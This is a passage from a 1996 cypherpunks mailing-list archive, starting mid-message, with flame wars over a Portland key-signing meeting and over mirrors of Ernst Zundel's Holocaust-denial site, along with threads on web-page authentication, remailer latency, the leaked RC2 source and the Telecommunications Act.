    orchestrated Psy Ops campaign propagated naively by the 
    4th Estate. 
 
 
  A few days ago I bought Markoff and Shimomura's Takedown. I've 
  read the first three chapters. 
 
  In my opinion: 
 
    (1)  the book is an important part of that well orchestrated 
         Psy Ops campaign 

    (2)  the book's designed from the word go to play that part. 
 
 
  Cordially, 
 
  Jim 
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Fri, 2 Feb 1996 18:07:22 +0800
To: cypherpunks@toad.com
Subject: Helping the Crypto-Clueless
Message-ID: <2.2.32.19960202095316.0069c6a8@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


While talking with Alan Olsen about the impending Telecommunications Decency
Act, a thought struck me: one of the groups that's really going to be hurt
by this is pagans. Me, I'm one o' them Christian types; it's my anarchism
that'll get me on lists. But insofar as cypherpunks have contact with pagans
(and aboriginal American groups and the like), probably there are a lot of
folks who should be ramping up for privacy right away.

Bruce Baugh
bruce@aracnet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 2 Feb 1996 18:26:01 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [noise] Re: Charter of PDX Cpunk meetings
Message-ID: <2.2.32.19960202100334.009241ec@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I think an explanation for this is due.  Jim is going to move his complaints 
here instead of dealing with them with me no matter what I do...

A bit of history here...

I had seem Jim Bell's postings and had not thought too much about them one 
way or another.  I felt that some people had been a bit too hard on him, but 
did not care one way or another.

I organized a physical meeting on Jan 20th at a public coffee house in 
portland.  Jim showed up.  During this meeting he espoused some ideas which 
I found very bothersome because they sounded far too much like "magical 
thinking" and pseudo science.  I did not challenge him about them at the 
meeting and tried to move on  to other things.

A while ago an anonymous poster made a number of comments about Jim Bell's 
beliefs involving assassination politics.  He brought up a number of valid 
points.  Jim ignored all of those points and flamed him on something totally 
without substance.  (Not signing messages and not using an identifiable 
nym.)

This bothered me. I responded to the post.  A good portion of this message 
was flame, but it contained a number of questions about the workability of 
Jim's pet theories.

Jim's response to this was to question the validity of the post, but not 
deal with any of the substance of the arguments.  (He was questioning it 
because I did not sign the posting.)  I ignored the post as I had other 
things occupying my time...

During the period of time between the meeting and the offending post I had 
created a pdx-cypherpunks list.  I had a number of people who were 
interested and it seemed like a good idea at the time...

Well, i posted on the list a question about the next meeting and mentioned 
about  the results from the key signing.  (I had three people, who i did not 
mention by name, who had not signed keys or gotten back to me on it.)  I 
relieved a response from Jim about my messages to him here and why he had 
not signed anyone's keys.  [For those who are interested, I can forward the 
original messages.  They are interesting reading, in an odd sort of way...] 
 It came down to him complaining about my messages on national list.  He 
still did not address any of the issues I had raised (he still has not), but 
was pretty pissed.

A number of the other people on the list took him to task on a number of the 
comments he made.  It grew into a pretty hot flame war on the list.  After I 
started to get complaints and it prevented anything useful being posted, I 
posted a message to take the discussion to e-mail or I would start banning 
people from the list.  Jim ignored that request and I removed him from the 
list.

That is why it has moved back here.

This will be my last response to Jim's rantings in public.  i will be glad 
to deal with questions in e-mail.  I have sent a number of responses to Jim 
already in e-mail and he has ignored them.  He has made veiled threats to me 
on the pdx list and has shown no sign of wanting to deal with this in a 
rational manner.

The issue comes down to this.  Jim Bell has a number of ideas i disagree 
with.  I have challenged him on some of those ideas.  He is unwilling to 
answer any questions as to the flaws in his beliefs.  Instead, he takes any 
questioning of his ideas as personal attacks.  I refuse to give any respect 
to an individual who presents his ideas to the world and yet is unwilling to 
defend them in public (or in private).

I suggest you get your killfiles ready.  I will be killfileing Mr. Bell's 
comments on this list as it does not belong here.

The following is the last I will say publically on the matter.

At 12:16 AM 2/2/96 -0800, jim bell wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>At 10:52 PM 2/1/96 -0800, Alan Olsen wrote:
>
>>
>>I requested that this debate be taken to private e-mail.  Since you seem 
to 
>>not want to do that, and since you insist of making false and unrealistic 
>>claims, 
>
>Which "false and unrealistic claims"?

Well, lets see...  The claim that you have a method of "rendering a building 
uninhabitable by electronic equipment for at least 30 days".  The claims 
that the Portland meeting was a "private meeting".  That I did not inform 
people of that fact.  That I somehow owe you an apology for statements which 
you seem to be unwilling to deal with.  I am sure that i can dig up more.


>I am removing your name from the subscription list for 
>>pdx-cypherpunks.
>
>This isn't a DEBATE.  

That is because you are not willing to debate.  You want your beliefs 
accepted with no proof and no rational thought.  You want them to be 
accepted without question.

>It is a WARNING to all other potential suckers in the 
>Portland Oregon area that Alan Olsen engaged in highly unethical behavior 
>with regards to the recent cypherpunks meeting, 

What behavior was that Jim?  I told people about your loonie scheme to 
"disable hardware"?  If you did not want it known, then you should have kept 
your mouth shut!  (The first rule of not being seen is DON'T STAND UP!)  You 
seemed to have some sort of idea that it was a private meeting.  Nowhere was 
it stated that it was private.  We were in a crowded coffee house.  You were 
sitting in front of a big glass window.  Anyone who wanted to take the time 
to hear you could have.

There was no reasonable expectation of privacy at that meeting.

I am sorry that you have suffered embarrassment.  Grow up.

>flamed me without 
>justification in the national list,

I gave my justification.  You are unwilling to respond to criticism of your 
ideas.  You still are.  Sorry, but you need to grow an epidermal layer.

> failed to respond to security inquiries,

I did not sign my messages to him.  He assumed that it must be some sort of 
spoof.  I left it unanswered for two reasons.  At the time i was not really 
needing a confrontation (as my personal life was taking time) and I was not 
certain how to answer.  (How do you answer someone who is THAT paranoid?)  I 
wonder if he assumes Tim May's messages are all spoofs.  (He may have 
something there...)
 
>failed to deny issues and matters of truth, 

Did not answer mail...

>and failed to properly deal with 
>a situation that he had a responsibility to handle ethically.  Not to 
>mention lying in the comment above.

Jim is not willing to deal with the issues i keep bringing up so i must be 
lying...


>I am going to take this to the national list, because you took it there 
>first in your original flame:  

And I banned Jim from the Portland list...

>I am going to point out that you flamed me 
>for no good reason; you engaged in a "knee-jerk" "debunking" without even 
>knowing what you were ostensibly "debunking,"  

I was flaming you for being unwilling to clarify your positions.  You made 
extraordinary claims and have been unwilling to explain how any of this is 
supposed to work or given anyone any sort of reason as to why we should 
believe you.

>that you failed to respond to 
>my polite request for clarification;

Yeah, that one is my fault.  i should have responded sooner to that message. 
 

> that you've attempted to pretend that I 
>was somehow at fault for noticing your transgressions; 

No.  You were at fault for ignoring every issue that was brought up.  You 
have been unwilling to deal with anything resembling substance and instead 
insist on continuing this petty flame war.

>that your local 
>clique is pre-programmed to defend you in the face of your transgressions.

i.e. the rest of the Portland list jumped on his case for his behavior.  
Many of them are my friends.  At least one of them is someone i have only 
met once.  You seem unwilling to accept that maybe the idea that no one has 
sided with you is that they do not agree with you.
  
>I notice that some of them don't even know what a key-signing meeting is 
>FOR:  I've received commentary which suggests that they believe that 
>key-signing somehow vouches for the HONESTY of the person involved; not his 
>IDENTITY.

As I have stated before, the concept of identity is a slippery thing.  
Actually the information on the key signing that I posted, and the theories 
behind it, were from the FAQ written by Derek Atkins.

>Until you start responding substantively to legitimate complaints, that is 
>all you deserve.  The public needs to be warned about people like you.

You have one legitimate complaint.  (That I did not respond to mail in a 
timely fashion.)  Sorry...  Guilty.

The rest you have blown FAR out of proportion.

You are mad because i said some unpleasant things to you on a list where you 
so much want to be respected.  I suspect that you had lost the respect of 
most of them before I posted.  If they are that easily swayed, then you have 
not done alot to earn their respect and be able to keep it.

You have failed to respond to the mail I have sent in private.  That makes 
me suspect that you do not want to resolve the issue with me, but cause 
problems for me with others as "punishment" for exposing your outlandish 
views.  I am sorry that you feel that you have to go to such extremes.  It 
reinforces my decision to bounce you from the Portland list however.

The more you rant, the less I am willing to deal with you.  When my daughter 
acts like you she is sent to her room.  In your case, I will just have to 
ignore you...

Find an anagram for "Spiro Agnew".




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMRHgrOQCP3v30CeZAQGHFQf8CVDZAKzBv3vHy4aY9hiV2ydNJ+Dz1DX8
wQiA0Hg1eK5WuCJ4y6lIrZpSOR6h9ok86eGAdyaWqayscgcvDWVyTF1D/VJ3RPyM
vhbXLWF01DeG0eU+9ckqjoB4dJSYVYcdLRD18QzO/MDAmaOJaTehfxOT2BlNHHHi
WoHpH1SYq0JOHsN+5UoITA7GUR1JNNlTDhHBtcM17Wqm5WXnhwm+z1gpBPExIcZ6
VFMOsPBGqHj02lYZtUVUwFzmVXRlF9zbN7SzqyhnPdK0TkmH/V7jtk2A91C62DAw
6ZCE8KNQbXOMlyKS0RyhtUCXfPZpBTs77leP/9tKs1vyortPxO07GA==
=RoA4
-----END PGP SIGNATURE-----
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 2 Feb 1996 15:37:57 +0800
To: attila@primenet.com>
Subject: Anti-Nazi Authentication [Was: Tim's paranoid rant about Declan...]
In-Reply-To: <Pine.BSD.3.91.960202044001.18127A-100000@usr6.primenet.com>
Message-ID: <kl4PZOC00bkTMJBPdo@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 2-Feb-96 Re: Tim's paranoid rant
abo.. by attila@primenet.com 
>         if you want to indulge in personal rants and vendettas, take it to
>     personal mail.  secondly, you are slamming someone without the 
>     decency or courtesy to even copy him.

Yeah, I don't particularly enjoy rants, but I engage in them myself
occasionally, so I'm willing to cut Rich some slack.

We've since mended fences and we're working in the same direction. I had
thought his initial actions were slightly irrational, but now I know him
a bit better, I think.

Both of us are working in good faith, and that's what's important here.
In particular, the NeoNazi slime are really starting to piss of both of
us. Can anyone say "defamation," on this fascist's darling little page
at Georgia State: [ http://www.gsu.edu/~hisjwbx/ZUNDEL ]

>     This is a mirror archive of most of Ernst Zundel's holocaust 
>revisionist site. I DO agree with his views. I ALSO
                     ^^                         ^^^^
>     agree with his right to express them. There is an apparent campaign 
>of email and web bombing being launched
>     againt Zundel's site on Webcom, making it near-impossible to reach. 
>Germany has forced Deutsche Telekom to
>     censor access to his site by URL. This mirror archive exists to 
>demonstrate the folly and the danger of Internet
>     censorship. 
>
>     Read more about these attempts at censorship. 
>
>     -Declan McCullagh, declan@well.com, 1/29/96
       ^^^^^^^^^^^^^^^^  ^^^^^^^^^^^^^^^

Now, this guy copied that file from my web site. Fine -- it was up for
FTP. But editing my comments to *support* Neo-Nazis and leaving my name
is just fucking too much. I've sent him polite mail requesting a change.
We'll see what happens.

Cypherpunk relevance? Authentication for web pages. There's no reason
for a reasonable person to believe, at first glance, that I was *not*
the author.

Perhaps someone has suggested this before, but should a web browser's
functionality be extended to support authentication via an automated
PGP-type mechanism? Using comments, possibly. I guess I'm just pissed
over this attribution of Zundelscheistenviews to me, but has anyone else
run into such a problem?

(Legal threats and complaints to sysadmins are of course another
alternative...)

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Fri, 2 Feb 1996 17:45:07 +0800
To: cypherpunks@toad.com
Subject: Anonymity -> Untraceability -> High Latency?
Message-ID: <199602020919.CAA02994@nelson.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've been trying out various mechanisms for anonymity: remailer
chains, HTTP proxies. There's one problem that makes them inconvenient
to use regularly: latency.

A good Type I remailer chain takes at least an hour to deliver email,
instead of the 15 seconds I'm used to. Mixmaster-style takes even
longer; the delay is important to the security of the system.
Forwarding all my HTTP requests through a proxy adds an extra hop and
some processing to all web transactions, noticeably slowing down
browsing. I'm not much for waiting for computers.

The problem is that that these anonymity schemes rely on untraceability.
And to be untraceable, we have to have centralized servers take our
traffic and forward it along, stripping out identifying information,
burying it in the noise of lots of other traffic. But that forwarding
process seems guaranteed to add latency to the communication.

Back in the old days (ie: six months ago, before Web search engines
were big on the scene) I was reasonably happy with the
needle-in-a-haystack anonymity of the unorganized Internet. I posted
personal things to Usenet, fairly sure that only the members of that
Usenet group were going to see my messages. I ftped files from all
over without worrying that my transactions would be logged permanently.

But now, with the amazing success of Web searching, I no longer feel
that obscurity is sufficient security. Are there other approaches to
anonymity that don't impose the latency that forwarding messages
around does?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Fri, 2 Feb 1996 13:23:59 +0800
To: cypherpunks@toad.com
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
Message-ID: <199602020507.AAA23639@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Feb 1996 20:00:50 -0600, you wrote:

>	Ya know... This is getting old! It seems like RSA Data
>Security can't control their own site. It only seems like yesterday

That has nothing to do with it.  What they (or anyone else) can't
control is disassembling the code.... which is apparently where it
comes from.

>(actually about 2 years ago) that another one of their "RC" algorithms

Actually, about a year and a half ago...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 2 Feb 1996 14:09:54 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Freedom of speech question...
In-Reply-To: <199602012012.OAA00279@einstein.ssz.com>
Message-ID: <Pine.BSD.3.91.960202051821.18127B-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



	Jim's point is particularly valid in the U.S. --Congress (and the 
    states) pass statues that preempt the actual commission of the crime, or
    as Jim phrased it: for what might result. The enabling clause is 
    "conspiracy" which is best defined by:

	three men are getting stinking drunk in a bar across from a bank;
	one suggests they rob the bank, and they sit there drinking and
	planning. when they depart, one man passes out on the floor; the
	other two, of course, are arrested while in the act --but the
	police also arrested the sleeping drunk.  Why? Title 18 US ----

	   ...any one who commits, or conspires to commit, the crime of
	   (insert your favourite), shall be charged with a felony....

	conspiring to commit a crime, executed or not, is the same under
    U.S. law as committing the crime.  --welcome to America. In the
    civil courts of Europe, you either committed the crime, or you
    did not. conspiracy does not count in a civil law case.


On Thu, 1 Feb 1996, Jim Choate wrote:

> 
> It is a commenly held belief that shouting 'fire' in a crowded theatre is a
> crime because of the potential for harm to persons and property. It is one
> of the most commen examples given for limiting freedom of speech even though
> the Constitution says "Congress shall make no law...". This view is proposed
> as a equaly valid rationale for limiting crypto, virus technology, drugs,
> etc.
> 
> My question to the list is would it be a crime if you were alone in the
> theatre? If you developed a virus and didn't distribute it would that be a
> crime? If you give it to one person is it a crime? How about if you give it
> to millions? How many people must know a fact, posses source code or
> executable. In short, does freedom of speech rest on how many people are
> aware of your expression?
> 
> My position is that if you answer in the affermative then you are basicaly
> stating there is no freedom of speech. It should be perfectly permissible
> to shout 'fire' in a theatre filled to the brim. If anyone takes you
> seriously and is harmed then you should be liable for the damage. Your right
> to shout 'fire' is not relevant. If you accept the premise then what you are
> buying into is preemptive justice, in short judging somebody guilty by what
> they might do, not what they have done. If this is permitted then we have a
> serious problem in that anyperson is therefore guilty of whatever crime is
> desired.
> 
>  
> 
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 2 Feb 1996 14:15:51 +0800
To: Rich Graves <declan+@CMU.EDU>
Subject: Re: Tim's paranoid rant about Declan appearing on "Europe's Most Wanted"
In-Reply-To: <Pine.ULT.3.91.960201172626.11796h-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSD.3.91.960202044001.18127A-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    Rich:

	if you want to indulge in personal rants and vendettas, take it to
    personal mail.  secondly, you are slamming someone without the 
    decency or courtesy to even copy him.

	the whole Zundel thing is completely off the concept unless maybe
    a mention that Germany is trying to deny free speech rights to Zundel. 
    The man is entitled to his fifteen minutes in the sunlight, no matter
    how despicable he may be. everybody publicizing Zundel only extends 
    his fifteen minutes in thye sun.

	anyway, Rich, you are being childish.  I have two daughters who
    are always at each other's throats for something, but even a 10 year
    old is not as petty as you're pouting.  why in the world would you
    even want to claim Zundel's trash?  check the mirror for the fool. 

	[ BTW, if I were a sysadmin, I would not cut his service, but I 
    sure as hell would not encourage it. ]

	let's all have a nice day!

		attila [ the peacemaker ]

On Thu, 1 Feb 1996, Rich Graves wrote:

> On Thu, 1 Feb 1996, Declan B. McCullagh wrote:
> 
> > Excerpts from internet.cypherpunks: 1-Feb-96 Tim's paranoid rant about
> > D.. by Just Rich@c2.org 
> > > I disagree. It is clear to me that there is absolutely no cloud hanging 
> > > over us. If any German court tried to press charges against me for 
> > > posting Zendel's materials, they'd be laughed across the Argonne. Most 
> > > mainstream Jewish groups *love* me right now.
> > >  
> > > I find it curious, and I am beginning to get a little annoyed, that my
> > > name is rarely mentioned, though I set up the first mirror, and Declan got
> > > the files from me. 
> > 
> > So you're getting pissy that you're not The Only Zundel Mirror. Big
> > fucking deal. Get over it. The more the better.
> > 
> > I find it telling that you wrote me mail demanding that I alter my web
> > pages to your satisfaction or you'll smear me in the press, since your
> > web site (you informed me) is going to be featured in the next issue of
> > TIME, Internet World, and the San Francisco Chronicle.
> > 
> > Hey, guy, kudos to you. Glad to hear it. Smear the fuck away.
> 
> This does not accurately represent what I said, and it certainly does not 
> represent what I have done. You are still identified as "My friend 
> Declan," and I recommend that people visit your site.
> 
> I actually would have appreciated it if you had crowed, or at least 
> shared, your media contacts. For example, I only just now found out about 
> Steve Pizzo's poorly researched article in Web Review, where he presents 
> as my views deliberate lies that I told Zundel in order to get his 
> cooperation and trust.
> 
> > > I am very annoyed that Declan has not responded to repeated requests to
> > > remove the cleartext "Stanford University" from the parts of his Web site
> > > that mention me. Of course the stanford.edu, or at least net 36.190, will
> > > remain in the URL, but there is no reason that the link text could not say
> > > "Rich Graves' mirror." First Declan sent me mail saying he would respect
> > > my wishes, but he didn't.
> > 
> > Let's get the facts right and ignore Rich's distortions. I wrote:
> > 
> >     "I'll honor your wishes and take your full name off."
> > 
> > I did *not* write that I'd take Stanford's name off the pages. I did
> > take your full name off, as I said I would.
> 
> This does not accurately reflect your mail. At this time, you have not
> removed my full name, either. 
>  
> > >  Then a friend of mine reminded Declan of my
> > > request, and Declan responded with abuse. 
> > 
> > Your friend, Haggai Kupermintz, sent me unsolicited email demanding to
> > know why I didn't act on a request that was sent earlier that day. I
> 
> You will find that Haggai had been Cc'd on several messages back and forth
> on fight-censorship, and he was Bcc'd on my original request (at the
> header of my message to you was a notice that it was being Bcc'd to other
> people at Stanford).  While I don't appreciate his mommying me, I hardly
> consider his mail unsolicited or unwarranted, since you have still failed
> to honor my request. 
> 
> > have better things to do than leap on every demand I get, so I flamed
> > him. *shrug* Big deal. I didn't know a rather mild flame was "abuse." If
> > you don't want to be "abused," don't send me demands in unsolicited
> > email. (I'm glad for the sake of other "abusers" at Stanford that your
> > school's speech code was struck down by a California court last year.)
> 
> The "speech code" was never applied to anyone, and was widely regarded to 
> be unenforceable. I opposed it. It was a joke, yes.
> 
> What were we talking about again?
>  
> > > Declan wants me to believe that this disclaimer is enough:
> > >  
> > >        "Please note that the
> > >        existence of a web site at any particular institution does not
> > >        in any way imply endorsement. Universities and businesses
> > >        do not take responsibility for what their community members
> > >        or customers place online."
> > >  
> > > This is clearly untrue when the person in question is a staff member, as I
> > > am. Were I still a student, then I could more legitimately say that I'm a
> > > student at Stanford, and that I have the academic freedom to post whatever
> > > I want; but as someone who now merely works for a living at Stanford, I do
> > > whatever I want by the (very) good graces of my (very good) employer. 
> > 
> > I don't follow. In what way is that disclaimer untrue? You *do*
> > represent Stanford? The concept of academic freedom doesn't apply to
> > staff members? If that's true, you do have a point.
> 
> Then you, kadie, and I agree. I have a point. Why do you persist in 
> identifying, in two places, a Stanford University Mirror Site?
>  
> > > One mirror site was enough. The German providers would not have blocked
> > > stanford.edu had it remained the only mirror site. The President of
> > > Stanford, Gerhard Casper, is a recognized constitutional scholar from
> > > Germany. The Stanford Provost, Condoleezza Rice, was one of the two or 
> > > three people most responsible for the Bush Administration's policy 
> > > towards German Unification. Dozens of Stanford students have studied in 
> > > Berlin.
> > 
> > One mirror site may have had a limited effect, but more mirror sites
> > have a more significant effect.
> 
> I strongly disagree.
> 
> Which has more symbolic power for good, a single man standing in front of
> a tank in Tiananmen Square, or nuking Hiroshima and Nagasaki?
> 
> It is not ethical to abuse this power we have. Especially because neither 
> of us are students at the universities whose machines we are abusing.
> 
> > The press likes a local angle, and local mirrors are giving them just
> > that. I put a reporter from the Boston Globe in touch with the UMass
> > mirror operator, and a reporter from the Philadelphia Inquirer in touch
> > with the University of Pennyslvania mirror operator. I'd love to see
> > mirrors in every major city for greater coverage in every major paper.
> > 
> > If you don't understand that concept, you don't understand the way the
> > media works.
> 
> I do understand the way the media works. They live on "press releases" 
> from "recognized authorities." Most 
>  
> > So Rich, answer me this: "What articulable and demonstrable harm have
> > additional mirror sites done, besides hurt your ego?"
> 
> Since my mirror site has been limited to .edu and selected other domains 
> for a full day, this is an odd question. 
> 
> The demonstrable harm, as you now agree, is that the Ottawa Times, 
> http://intranet.on.ca/ott_time.html, the Stormfront-L neo-nazi list, and 
> so on are full of lies about how universities sympathetic to Zundel's 
> fight against Zionist oppression and the Holocaust Lie have jumped to his 
> defense.
>  
> > > This is ludicrous. I expect better from you.
> > 
> > I'm a big fan of Tim's, and I think that while he may have been jesting,
> > his comments have a serious undertone.
> > 
> > I don't really expect to be locked up for the rest of my life in a
> > German cellblock, but harassment at entry/exit points is possible.
> > Perhaps probable, given that other "distributors" of Neo-Nazi spew have
> > experienced just that.
> 
> No distributors. Only point sources. And as has been pointed out, they 
> often get off with a slap on the wrist.
> 
> You have been duped by Zundel's false claims of persecution. I bet you 
> even bought the "Dr. Axl Clocstein" story for a while.
>  
> > > Declan, if you don't fix up your page the way I want it by morning (please
> > > not that you have three more hours of morning than I do), I will post a
> > > modified (spell-checked) version of this note on my Web page, to
> > > alt.censorship, and to your "fight-censorship" mailing list.
> > 
> > Please send me in private email (or post it here if you really want)
> > exactly what you want me to change.
> 
> 1. As I've been saying for the last day and a half, please remove all 
> occurrences of the strings "Stanford" and "Graves." I hardly think that 
> requesting not to be so identified is egotistical.
> 
> 2. While you're at it, it would be good to remove the following as well, 
> which does not accurately reflect the facts.
> 
>  In early January, Zundel contacted the Simon Wiesenthal Center and asked
>  permission to reproduce some of their materials. He wanted to disprove
>  some of their views as he had tried to rebut those of the Nizkor Project.
>  (The Nizkor folks earlier had requested bidirectional linking. Zundel
>  agreed to their request, heralding the experiment as "The Great Internet
>  Holocaust Debate.")
> 
> Nizkor's response to this is rather prominent on their Web site.
> 
> 3. Please fix this:
>  
>  January 29, 1996: This site goes online, with the help of files supplied
>  by Rich (rich@c2.org), supplemented with more recent documents taken
>  directly from the Zundelsite. Rich's site at Stanford University goes
>  online. (Note that Rich and I mirrored the Zundelsite at our own
>  initiative, not by request.)
> 
> To bolster Zundel's coyright claim against the National Alliance, please
> clarify that "we" specifically requested the materials from Zundel, and
> that his handler Marc uploaded them all to "one of our machines" (since we
> could not have run a WebWacker on the highly overloaded webcom.com). Also 
> remove the string "Stanford." In any case, the files are no longer 
> available at Stanford.
> 
> 4. February 1, 1996: Web Review Magazine reports on the mirror sites.
> 
> I have sent mail to Steve Pizzo and requested that he call me to correct 
> some false statements attributed to me.
> 
> 5. February 1, 1996, afternoon: UMass censors mirror. Simon Wiesenthal
>    Center sends letters of protest to participating mirror universities.
>    Sameer announces University of California at Berkeley mirror. 
> 
> Every one of these is false.
> 
> a. The operator of the UMass mirror objects to your characterization of 
>    what happened as "censorship," and to your posting his private mail.
> 
> b. Where is your confirmation of Simon Wiesenthal's action?
> 
> c. Sameer has not announced a UC Berkeley mirror. He specifically asked 
>    that it not be listed because like most of us, he is beginning to have
>    ethical qualms. 
> 
> 6. On index.html you have:
> 
>  There is an apparent campaign of email and web bombing being launched
>  againt Zundel's site on Webcom, making it near-impossible to reach. 
> 
> Do you have a source for this besides me? Well, I retract the rumor. In
> fact it seems that the problem is that Zundel foolishly put a bunch of
> huge RealAudio files on his page that are overloading the server.
> 
> > Rich, by now I suspect you've seen this joke, but what the hell:
> > 
> >    Q: What's a left-wing firing squad?
> > 
> >    A: Everyone stands in a circle and shoots at each other
> 
> I guess this is supposed to be something clever about how the vanguard is
> supposed to discard their personal interests for the common good. 
> 
> I am a member of no vanguard.
> 
> -rich
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Fri, 2 Feb 1996 22:31:07 +0800
To: "Declan B. McCullagh" <declan+@cmu.edu>
Subject: Re: Anti-Nazi Authentication [Was: Tim's paranoid rant about Declan...]
In-Reply-To: <kl4PZOC00bkTMJBPdo@andrew.cmu.edu>
Message-ID: <199602021350.GAA03188@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Declan B. McCullagh" <declan+@CMU.EDU>
 is alleged to have written:
> 
> Now, this guy copied that file from my web site. Fine -- it was up for
> FTP. But editing my comments to *support* Neo-Nazis and leaving my name
> is just fucking too much. I've sent him polite mail requesting a change.
> We'll see what happens.


Polite?  You show more restraint than most of us would 
I suspect.  Actually it is probably a good tactic for the
first encounter.


> Cypherpunk relevance? Authentication for web pages. There's no reason
> for a reasonable person to believe, at first glance, that I was *not*
> the author.


It is possible to PGP-clearsign web pages using comments.
PGP's insertion of "- " before any line beginning with "-"
might cause a problem, but you'll just have to be a little
more careful.  I'm considering hacking up a "PGP verification
service" web page which will accept a PGP-signed URL, 
retrieve it, verify it, and report the results.  Of course
I'll make it clear that this service is very susceptible to
active attacks.


On a related topic it would probably be wise for you to
clear-sign your mail, Declan.  Establish a public key with me,
and next time I see mail from you saying "I've been reading
about this 'the Holocaust was a hoax' stuff and it's actually
kind of convincing." I'll know where to lay the authorship of
the words...  :-)


Regards,

Bryce

                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMRIWjPWZSllhfG25AQE4UwP/eFEXJ0qoocgRdcNFqf2jeW/XOe8UNA8k
cQkYRSuyTwODEbNtkoLWoAGh+ucttGToy13uvA2e4WO8PG3LD2BVQlHP5Xi/umip
XpUn+Ge7fbCm4O2dlogf6HNLmTNo5BrwX8ET46wn1K4hLf695cIyYoMToua+4xWr
azZPYCg+eYs=
=unP7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 2 Feb 1996 14:50:47 +0800
To: cypherpunks@toad.com
Subject: Nu?
Message-ID: <199602020603.HAA11792@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Tim May, 2/1/96, 10:39:

> * I believe that much of "Jewish culture" is, for historical reasons,
> closely related to German culture. It is understandable that so many Jews
> hate Germans and German culture, but also sad. (I don't mean the newer
> Israeli/Hebrew culture, but the Yiddish/German culture, which was so shaken
> by the Holocaust that, sadly in my opinion, it cannot acknowledte its
> essential Germanness.)

   We have an old saying, Tim, "Nisht geshtoygen, nisht gefloygen," which
more or less means "You're making no sense" - literally, "You're not
standing, you're not flying." I'll bow to you on CP-related matters any
day, but on the subject of Yiddish culture you're clearly pretty clueless.
No great loss, I assure you.

   ObCrypto: Reputations are subject-specific, not global. Your reputation
on the Holocaust is nill, about the same as my relatives' (the ones with
the funny striped suits and tattoos on their forearms) reputations are on
the subject of encryption. 
   Stick to crypto, folks - this isn't Shoah-punks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tony Iannotti <tony@secapl.com>
Date: Fri, 2 Feb 1996 20:37:20 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
In-Reply-To: <9602020046.AA23769@sulphur.osf.org>
Message-ID: <Pine.A32.3.91.960202071529.72228B-100000@fred.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Feb 1996, Rich Salz wrote:

> At any rate, I'll stop my comparison of the distributed RC2 and the 
> licensed RC2 since RSA's done it for us. :)

What if it's just a ruse by them to ID it as RC2? They could have even
released a bogus version themselves, and then sent up a hue and cry.... 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Fri, 2 Feb 1996 23:59:29 +0800
To: cypherpunks@toad.com
Subject: Re: Telecom Bill may makes abortion talke illegal on the net...
Message-ID: <199602020749.CAA10281@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards <tedwards@Glue.umd.edu> wrote:

>Sec. 507 of the Telecom Bill Ammends Section 1462 of title 18 of the U.S. 
>Code (Chapter 71), in ways which may make sending the following over the 
>Internet illegal:

[..]
> o any information telling about how to obtain or make abortions and 
>   drugs, or obtaining or making anything that is for indecent or immoral 
    ^^^^^
>   use

So the PharmWeb and any discussion of pharamacology would be illegal?
